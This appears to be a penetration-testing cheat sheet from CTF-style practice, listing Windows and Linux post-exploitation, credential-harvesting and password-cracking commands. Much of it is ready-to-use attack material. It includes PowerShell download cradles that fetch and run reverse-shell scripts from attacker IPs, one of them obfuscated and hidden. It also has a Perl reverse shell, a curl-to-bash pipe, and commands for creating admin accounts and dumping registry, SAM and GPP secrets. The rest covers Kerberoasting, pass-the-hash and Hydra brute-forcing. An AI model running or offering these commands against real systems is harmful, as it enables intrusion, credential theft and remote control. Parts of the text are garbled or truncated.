Windows Exploitiation
Basic commands
Copy net user $username $password /add
Copy net localgroup "$groupname" $username /add Create an local administrator account
Copy net localgroup administrators $username /add Find out Windows System Information
Copy systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Copy wmic qfe get Caption,Description,HotFixID,InstalledOn
Copy findstr /si password .txt
findstr /si password .xml
findstr /si password *.ini Find all those strings in config files
Copy dir /s pass == cred == vnc == .config Find all passwords in all files
Copy findstr /spin "password" . findstr /spin "password" . Download files from Attacker Box ( Kali ) to the target via powershell
Copy powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.39/rev.ps1')
Copy powershell.exe invoke-webrequest -uri http://$attackerip/nc.exe -outfile C:\users\user\appdata\local\temp\nc.exe Other downloading and uploading techinques
you need to manually edit the powershell script to run itself without -C or -command.
Provoke this commmand maually by adding the command at the end of the powershell file.
Copy Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444 You can copy the file to the victim and execute the command just by invoking DownloadString without Powershell –Command
Copy powershell.exe “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1')" Or you can manually invoke the command via powershell string. For example,
Copy powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444" Also for PS version 1 and 2
PS Version 1
Copy c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')" PS Version 2
Copy c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA Finding password files in Registry
VNC
Copy reg query "HKCU\Software\ORL\WinVNC3\Password" Windows autologin
Copy reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName
Copy reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword Or via Powershell using Get-ItemProperty to exploit registry
Copy PS > Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*" SNMP Paramters
Copy reg.exe query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" Putty
Copy reg.exe query "HKCU\Software\SimonTatham\PuTTY\Sessions" Search for password in registry
Copy reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s Finding credentials in Groups.xml
On an atttacker box, you can decrypt Group Policy Password via:
Copy gpp-encrpyt $password Finding admin credentials from AppData
Copy dir /a C:\Users\$user\AppData\Roaming\Microsoft\Credentials\ Running commands as a different user by using runas command
Copy runas /user:ACCESS\Administrator /savecred "cmd.exe C:\Users\Administrator\Desktop\root.txt > C:\Users\security\AppData\Local\Temp\test.txt" Enable RDP in Windows Target
Copy C:\Windows\system32>netsh firewall set service remoteadmin enable
netsh firewall set service remoteadmin enable
Ok.
C:\Windows\system32>netsh firewall set service remotedesktop enable
netsh firewall set service remotedesktop enable
Ok. Port 88 - Kerberoasting
Once you have a user shell you can start kerberoasting to get other users' credentials.
Without password
Copy python GetUserSPNs.py -request active.htb/SVC_TGS With password
Copy GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request Then try cracking the Kerberos ticket by
Copy john GetUserSPNsOutput.txt --wordlist=/usr/share/wordlists/rockyou.txt Then login with psexec.py.
Copy psexec.py administrator@active.htb You can choose a service for avoiding antivirus detection with --service-name.
Copy psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100 -service-name LUALL.exe Exploiting AD users
You should import the 'activedirectory' module first.
Copy Import-module activedirectory Add an AD member to a Group
Copy add-adgroupmember -Identity "$group" -Members $member Other Useful commands
Strings prints text strings embedded in binary files such as executables.
Copy root@kali:~/htb/tally# strings tester.exe
!This program cannot be run in DOS mode.
Rich7J
~~~
~~~
SQLSTATE:
Message:
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
select * from Orchard_Users_UserPartRecord
~~~
~~~ Transfering file to windows
Copy echo open $attackerip 21> ftp.txt
echo USER offsec
password>> ftp.txt
echo bin>> ftp.txt
echo GET shell.php >> ftp.txt
echo bye >> ftp.txt Then run
List out all schedule tasks
Copy schtasks /query /fo LIST /v And extra misc to check:
Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol*.xml (cmd.exe)
Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
Linux Exploitation
Spawing a intereactive TTY linux shell
Copy python -c 'import pty; pty.spawn("/bin/sh")'
export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin Then Ctrl-Z
Type reset and hit return.
Exploiting Directory
Find any writable directories
Copy find / -type d ( -perm -g+w -or -perm -o+w ) -exec ls -adl {} \; Or use
Copy find / -writable -type d 2>/dev/null find / -perm -222 -type d 2>/dev/null find / -perm -o w -type d 2>/dev/null Finding only Executable folders
Copy find / -perm -o x -type d 2>/dev/null Finding Writable and executable folders
Copy find / ( -perm -o w -perm -o x ) -type d 2>/dev/null Find commands that allows you to run as root with no password
You'll see the similar result as below. As you can see, User shelly can use /usr/bin.perl as root with no password.
e.g) If you are allowed to use perl command as root, you can get a revese shell stright
Copy sudo perl -e 'use Socket;$i="10.10.14.43";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' If this doesn't give you any hints
Check the kernel versions of the victim machines
Copy uname -ar
cat /proc/version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release # Debian based
cat /etc/redhat-release # Redhat based Try googling the kernel version and PE exploits to try out.
Check the bash histroy
Check the process it's running
Copy ps aux | grep $service Finding Plaintext Passwords in web server
Plaintext Password in /var/www/html/*.php
Copy cat /var/www/html/config.php | grep password In mail
Copy cat /var/spool/mail | grep $item Or using LinEnum.sh
Copy LinEnum.sh -t -k password Chekcing the service ti's running
GTFOBins
SUID
Copy find / -perm -u=s -type f 2>/dev/null GUID
Copy find / -perm -g=s -type f 2>/dev/null There are three useful automation tools that I use the most, which are
LinEnum.sh
Copy curl http://$attackerip/LinEnum.sh | /bin/bash
chmod +x LinEnum.sh
./LinEnum.sh pspy
pspy is a command line tool designed to snoop on processes without need for root permissions.
Copy Cron job watching with pspy
~/pspy (master) $ make example Other useful commands
List out all scheduled tasks
Copy schtasks /query /fo LIST /v List the capability of a file
Copy getcap -r / 2>/dev/null
Password Cracking
Belw are the Cracking methonlogy used in CTF challanges.
Creating a password list
1) You can create your own dictionary or combing two different wordlists by
Copy cat wordlist >> wordlist2 2) Create a customised wordlist from html page
Copy curl http://example.com > example.txt
html2dic example.txt Or use Cewl
Copy cewl -w createWordlist.txt -m 6 https://www.example.com -w is the minimum password length.
To identify which hash type it is encrypte with, use either of below commands build in Kali
Copy hash-identifier
hasid Cracking Hash
Two Kali built-in tools can be used, hashcat and john.
Hashcat
Copy hashcat -m 13100 -a 0 -o found.txt admin.hash /usr/share/hashcat/rules/rockyou-30000.rule -m= hash mode, 13100 denotes Kerberos 5 TGS-REP etype 23
-a=mode, 0 denotes straight
-o= output
John the ripper
Copy john --wordlist=wordlist.txt dump.txt Keepass password
Copy keepass2john CEH.kdbx > crackthis.hash
john --wordlist=wordlist.txt crackthis.hash
Or
hashcat64.exe -m 13400 .\crackthis.hash .\rockyou.txt Putty key ppk to SSH key
Copy puttygen my_private_key.ppk -O private-openssh -o alice.key
chmod 600 alice.key
Linux shadow password
First you need to combine the passwd file with the shadow file using the unshadow-program.
Copy unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=wordlist.txt unshadowed.txt Decoding Base64
Copy cat $encodedfile | base64 --decode > decodedfile.txt Cracking Unzip file password
Copy fcrackzip -D -p /usr/share/wordlists/rockyou.txt data.zip Convert Hex to Binary
Copy cat hex.txt | xxd -r -p Cracking password for Services
Port 22- SSH
Copy hydra -l root -P wordlist.txt $targetip ssh
hydra -L userlist.txt -P pass.txt ssh://$targetip Cracking Priave RSA Key
Copy python ssh2john.py user_rsa > crackable.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crackable.txt Port 161 - SNMP
Copy hydra -P wordlist.txt -v 102.168.0.101 snmp Port 3389 - RDP
Copy ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101 Port 80/443 htaccess
Password protect directory with htaccess
Step 1
Create a directory that you want to password-protect. Create .htaccess tile inside that directory. Content of .htaccess:
Copy AuthType Basic
AuthName "Password Protected Area"
AuthUserFile /var/www/html/test/.htpasswd
Require valid-user Create .htpasswd file
Copy htpasswd -cb .htpasswd test admin
service apache2 restart This will now create a file called .htpasswd with the user: test and the password: admin
If the directory does not display a login-prompt, you might have to change the apache2.conf file. To this:
Copy <Directory /var/www/html/test>
AllowOverride AuthConfig
</Directory> Then bruteforce with
Copy medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10 Tomcat Apache
Copy hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http://10.10.10.95:8080/manager/html HTTP POST Login Form
Copy hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect*” Pass The Hash
You can authenticate services by using a valid username and the hash value without a decrypted password.
SMB PTH
Copy export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
Copy pth-winexe -U administrator //$targetip cmd
pth-winexe -U admin/$hash:has //$targetip cmd e.g)
Copy pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
Copy smbclient //$targetip/C$ -U "$targetuser" --pw-nt-bash $hash RDP PTH
Copy evil-winrm -u "$targetuser" --hash $hash -i $targetip By using freerdp-x11
Copy apt-get install freerdp-x11
xfreerdp /u:admin /d:win7 /pth:hash:hash /v:$targetip Misc: Windows Password check in SAM
You can check two fundamental files from Windows, system registry and SAM registry.
Copy Systemroot can be windows
%SYSTEMROOT%\repair\SAM
windows\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
System file can be found here
SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system Then extract the hashed password
